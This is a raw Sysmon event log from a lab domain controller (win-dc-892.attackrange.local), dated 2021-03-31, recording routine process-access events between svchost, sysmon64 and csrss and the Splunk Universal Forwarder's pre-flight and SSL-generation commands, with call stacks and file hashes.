12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.364{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647F-6064-4D00-00000000AE01}28042548C:\Windows\system32\cmd.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.339{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
